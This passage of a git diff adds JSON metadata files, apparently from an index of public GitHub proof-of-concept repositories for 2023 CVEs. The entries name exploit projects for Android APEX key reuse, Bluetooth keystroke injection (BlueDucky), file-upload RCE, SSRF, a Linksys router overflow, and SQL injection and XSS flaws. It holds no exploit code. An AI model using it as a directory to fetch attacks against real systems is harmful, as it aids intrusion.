+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45779.json b/2023/CVE-2023-45779.json
new file mode 100644
index 0000000000..cc3800f811
--- /dev/null
+++ b/2023/CVE-2023-45779.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748840559,
+ "name": "rtx-cve-2023-45779",
+ "full_name": "metaredteam\/rtx-cve-2023-45779",
+ "owner": {
+ "login": "metaredteam",
+ "id": 91286942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91286942?v=4",
+ "html_url": "https:\/\/github.com\/metaredteam"
+ },
+ "html_url": "https:\/\/github.com\/metaredteam\/rtx-cve-2023-45779",
+ "description": "Proof-of-concept code for Android APEX key reuse vulnerability",
+ "fork": false,
+ "created_at": "2024-01-26T21:17:38Z",
+ "updated_at": "2024-06-19T04:16:33Z",
+ "pushed_at": "2024-01-31T19:33:59Z",
+ "stargazers_count": 73,
+ "watchers_count": 73,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 73,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45828.json b/2023/CVE-2023-45828.json
new file mode 100644
index 0000000000..5e84c89229
--- /dev/null
+++ b/2023/CVE-2023-45828.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706068061,
+ "name": "CVE-2023-45828",
+ "full_name": "RandomRobbieBF\/CVE-2023-45828",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45828",
+ "description": "RumbleTalk Live Group Chat <= 6.1.9 - Missing Authorization via handleRequest",
+ "fork": false,
+ "created_at": "2023-10-17T08:41:54Z",
+ "updated_at": "2023-11-13T00:42:27Z",
+ "pushed_at": "2023-10-17T08:58:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45857.json b/2023/CVE-2023-45857.json
new file mode 100644
index 0000000000..68a67d94c1
--- /dev/null
+++ b/2023/CVE-2023-45857.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 706677544,
+ "name": "CVE-2023-45857",
+ "full_name": "valentin-panov\/CVE-2023-45857",
+ "owner": {
+ "login": "valentin-panov",
+ "id": 63700910,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63700910?v=4",
+ "html_url": "https:\/\/github.com\/valentin-panov"
+ },
+ "html_url": "https:\/\/github.com\/valentin-panov\/CVE-2023-45857",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-18T12:19:34Z",
+ "updated_at": "2023-10-18T19:25:42Z",
+ "pushed_at": "2023-10-19T15:20:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710123753,
+ "name": "CVE-2023-45857-Demo",
+ "full_name": "intercept6\/CVE-2023-45857-Demo",
+ "owner": {
+ "login": "intercept6",
+ "id": 4459220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4459220?v=4",
+ "html_url": "https:\/\/github.com\/intercept6"
+ },
+ "html_url": "https:\/\/github.com\/intercept6\/CVE-2023-45857-Demo",
+ "description": "CVE-2023-45857の挙動を確認するデモ",
+ "fork": false,
+ "created_at": "2023-10-26T04:18:03Z",
+ "updated_at": "2023-10-26T04:19:29Z",
+ "pushed_at": "2023-10-26T04:18:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 723193114,
+ "name": "CVE-2023-45857-Demo",
+ "full_name": "fuyuooumi1027\/CVE-2023-45857-Demo",
+ "owner": {
+ "login": "fuyuooumi1027",
+ "id": 151829119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151829119?v=4",
+ "html_url": "https:\/\/github.com\/fuyuooumi1027"
+ },
+ "html_url": "https:\/\/github.com\/fuyuooumi1027\/CVE-2023-45857-Demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-24T22:42:56Z",
+ "updated_at": "2023-12-04T06:56:24Z",
+ "pushed_at": "2023-11-24T22:43:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45866.json b/2023/CVE-2023-45866.json
new file mode 100644
index 0000000000..0b59fa7c42
--- /dev/null
+++ b/2023/CVE-2023-45866.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 743868830,
+ "name": "BlueDucky",
+ "full_name": "pentestfunctions\/BlueDucky",
+ "owner": {
+ "login": "pentestfunctions",
+ "id": 144001335,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4",
+ "html_url": "https:\/\/github.com\/pentestfunctions"
+ },
+ "html_url": "https:\/\/github.com\/pentestfunctions\/BlueDucky",
+ "description": "🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) 🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)",
+ "fork": false,
+ "created_at": "2024-01-16T06:52:02Z",
+ "updated_at": "2024-06-25T12:19:12Z",
+ "pushed_at": "2024-06-19T04:31:02Z",
+ "stargazers_count": 939,
+ "watchers_count": 939,
+ "has_discussions": false,
+ "forks_count": 160,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 160,
+ "watchers": 939,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 743886715,
+ "name": "BluetoothDucky",
+ "full_name": "Eason-zz\/BluetoothDucky",
+ "owner": {
+ "login": "Eason-zz",
+ "id": 53202099,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53202099?v=4",
+ "html_url": "https:\/\/github.com\/Eason-zz"
+ },
+ "html_url": "https:\/\/github.com\/Eason-zz\/BluetoothDucky",
+ "description": "CVE-2023-45866 - BluetoothDucky implementation (Using DuckyScript)",
+ "fork": false,
+ "created_at": "2024-01-16T07:44:35Z",
+ "updated_at": "2024-05-14T12:14:52Z",
+ "pushed_at": "2024-01-15T15:16:40Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 747408718,
+ "name": "cve-2023-45866-py",
+ "full_name": "jjjjjjjj987\/cve-2023-45866-py",
+ "owner": {
+ "login": "jjjjjjjj987",
+ "id": 106833546,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106833546?v=4",
+ "html_url": "https:\/\/github.com\/jjjjjjjj987"
+ },
+ "html_url": "https:\/\/github.com\/jjjjjjjj987\/cve-2023-45866-py",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-23T21:39:41Z",
+ "updated_at": "2024-01-23T21:40:35Z",
+ "pushed_at": "2024-01-23T21:42:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4596.json b/2023/CVE-2023-4596.json
new file mode 100644
index 0000000000..9183fae63c
--- /dev/null
+++ b/2023/CVE-2023-4596.json
@@ -0,0 +1,97 @@
+[
+ {
+ "id": 685284508,
+ "name": "CVE-2023-4596",
+ "full_name": "E1A\/CVE-2023-4596",
+ "owner": {
+ "login": "E1A",
+ "id": 57531297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531297?v=4",
+ "html_url": "https:\/\/github.com\/E1A"
+ },
+ "html_url": "https:\/\/github.com\/E1A\/CVE-2023-4596",
+ "description": "PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.",
+ "fork": false,
+ "created_at": "2023-08-30T22:40:10Z",
+ "updated_at": "2024-06-21T00:11:29Z",
+ "pushed_at": "2024-02-08T20:41:01Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-4596",
+ "exploits",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802322129,
+ "name": "CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version",
+ "full_name": "X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version",
+ "owner": {
+ "login": "X-Projetion",
+ "id": 161194427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4",
+ "html_url": "https:\/\/github.com\/X-Projetion"
+ },
+ "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version",
+ "description": "CVE-2023-4596 Vulnerable Exploit and Checker Version",
+ "fork": false,
+ "created_at": "2024-05-18T01:39:12Z",
+ "updated_at": "2024-05-20T02:54:08Z",
+ "pushed_at": "2024-05-20T02:54:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814608034,
+ "name": "CVE-2023-4596-checker",
+ "full_name": "RHYru9\/CVE-2023-4596-checker",
+ "owner": {
+ "login": "RHYru9",
+ "id": 164749781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164749781?v=4",
+ "html_url": "https:\/\/github.com\/RHYru9"
+ },
+ "html_url": "https:\/\/github.com\/RHYru9\/CVE-2023-4596-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-13T10:41:33Z",
+ "updated_at": "2024-06-13T14:43:09Z",
+ "pushed_at": "2024-06-13T14:43:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45966.json b/2023/CVE-2023-45966.json
new file mode 100644
index 0000000000..1e93963ac2
--- /dev/null
+++ b/2023/CVE-2023-45966.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706845140,
+ "name": "CVE-2023-45966",
+ "full_name": "jet-pentest\/CVE-2023-45966",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2023-45966",
+ "description": "Blind SSRF in umputun\/remark42 <= 1.12.1",
+ "fork": false,
+ "created_at": "2023-10-18T18:18:25Z",
+ "updated_at": "2023-10-18T18:18:25Z",
+ "pushed_at": "2023-10-18T18:29:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45992.json b/2023/CVE-2023-45992.json
new file mode 100644
index 0000000000..b6f61aca4f
--- /dev/null
+++ b/2023/CVE-2023-45992.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707284838,
+ "name": "CVE-2023-45992",
+ "full_name": "harry935\/CVE-2023-45992",
+ "owner": {
+ "login": "harry935",
+ "id": 2310647,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2310647?v=4",
+ "html_url": "https:\/\/github.com\/harry935"
+ },
+ "html_url": "https:\/\/github.com\/harry935\/CVE-2023-45992",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-19T15:26:59Z",
+ "updated_at": "2023-10-19T15:27:00Z",
+ "pushed_at": "2023-10-19T15:45:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46003.json b/2023/CVE-2023-46003.json
new file mode 100644
index 0000000000..fc843ea6ce
--- /dev/null
+++ b/2023/CVE-2023-46003.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707100656,
+ "name": "CVE-2023-46003",
+ "full_name": "leekenghwa\/CVE-2023-46003",
+ "owner": {
+ "login": "leekenghwa",
+ "id": 45155253,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45155253?v=4",
+ "html_url": "https:\/\/github.com\/leekenghwa"
+ },
+ "html_url": "https:\/\/github.com\/leekenghwa\/CVE-2023-46003",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-19T08:17:53Z",
+ "updated_at": "2023-10-19T08:17:54Z",
+ "pushed_at": "2023-10-20T01:07:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46012.json b/2023/CVE-2023-46012.json
new file mode 100644
index 0000000000..64cb8422e9
--- /dev/null
+++ b/2023/CVE-2023-46012.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796794265,
+ "name": "CVE-2023-46012",
+ "full_name": "dest-3\/CVE-2023-46012",
+ "owner": {
+ "login": "dest-3",
+ "id": 62617135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62617135?v=4",
+ "html_url": "https:\/\/github.com\/dest-3"
+ },
+ "html_url": "https:\/\/github.com\/dest-3\/CVE-2023-46012",
+ "description": "LINKSYS AC1900 EA7500v3 IGD UPnP Stack Buffer Overflow Remote Code Execution Vulnerability",
+ "fork": false,
+ "created_at": "2024-05-06T16:35:19Z",
+ "updated_at": "2024-05-18T05:48:14Z",
+ "pushed_at": "2024-05-18T05:48:11Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46014.json b/2023/CVE-2023-46014.json
new file mode 100644
index 0000000000..69f6746c56
--- /dev/null
+++ b/2023/CVE-2023-46014.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717160403,
+ "name": "CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T17:40:37Z",
+ "updated_at": "2023-11-10T17:40:37Z",
+ "pushed_at": "2023-11-14T08:32:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46015.json b/2023/CVE-2023-46015.json
new file mode 100644
index 0000000000..e7ce991801
--- /dev/null
+++ b/2023/CVE-2023-46015.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717199456,
+ "name": "CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T19:40:49Z",
+ "updated_at": "2023-11-10T20:15:16Z",
+ "pushed_at": "2023-11-14T08:53:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46016.json b/2023/CVE-2023-46016.json
new file mode 100644
index 0000000000..0555979322
--- /dev/null
+++ b/2023/CVE-2023-46016.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717212106,
+ "name": "CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T20:24:40Z",
+ "updated_at": "2023-11-10T20:24:41Z",
+ "pushed_at": "2023-11-14T08:57:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46017.json b/2023/CVE-2023-46017.json
new file mode 100644
index 0000000000..3b0ff0fb41
--- /dev/null
+++ b/2023/CVE-2023-46017.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717217919,
+ "name": "CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-10T20:46:29Z",
+ "updated_at": "2023-11-10T20:46:30Z",
+ "pushed_at": "2023-11-14T09:00:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46018.json b/2023/CVE-2023-46018.json
new file mode 100644
index 0000000000..74883382f0
--- /dev/null
+++ b/2023/CVE-2023-46018.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717349464,
+ "name": "CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T07:37:57Z",
+ "updated_at": "2023-11-11T07:37:57Z",
+ "pushed_at": "2023-11-14T09:02:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46019.json b/2023/CVE-2023-46019.json
new file mode 100644
index 0000000000..c285204a19
--- /dev/null
+++ b/2023/CVE-2023-46019.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717359044,
+ "name": "CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T08:23:30Z",
+ "updated_at": "2023-11-11T08:23:31Z",
+ "pushed_at": "2023-11-14T09:04:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46020.json b/2023/CVE-2023-46020.json
new file mode 100644
index 0000000000..0bb6604e0c
--- /dev/null
+++ b/2023/CVE-2023-46020.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717361875,
+ "name": "CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T08:37:57Z",
+ "updated_at": "2023-11-11T08:37:58Z",
+ "pushed_at": "2023-11-14T09:05:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46021.json b/2023/CVE-2023-46021.json
new file mode 100644
index 0000000000..115eddf2ae
--- /dev/null
+++ b/2023/CVE-2023-46021.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717369802,
+ "name": "CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T09:14:56Z",
+ "updated_at": "2023-11-11T10:55:41Z",
+ "pushed_at": "2023-11-14T09:55:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46022.json b/2023/CVE-2023-46022.json
new file mode 100644
index 0000000000..7a820e4e81
--- /dev/null
+++ b/2023/CVE-2023-46022.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 717392042,
+ "name": "CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability",
+ "full_name": "ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability",
+ "owner": {
+ "login": "ersinerenler",
+ "id": 113091631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4",
+ "html_url": "https:\/\/github.com\/ersinerenler"
+ },
+ "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-11T10:54:25Z",
+ "updated_at": "2023-11-11T10:54:25Z",
+ "pushed_at": "2023-11-15T08:52:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46197.json b/2023/CVE-2023-46197.json
new file mode 100644
index 0000000000..8343c23755
--- /dev/null
+++ b/2023/CVE-2023-46197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 708807176,
+ "name": "CVE-2023-46197",
+ "full_name": "RandomRobbieBF\/CVE-2023-46197",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46197",
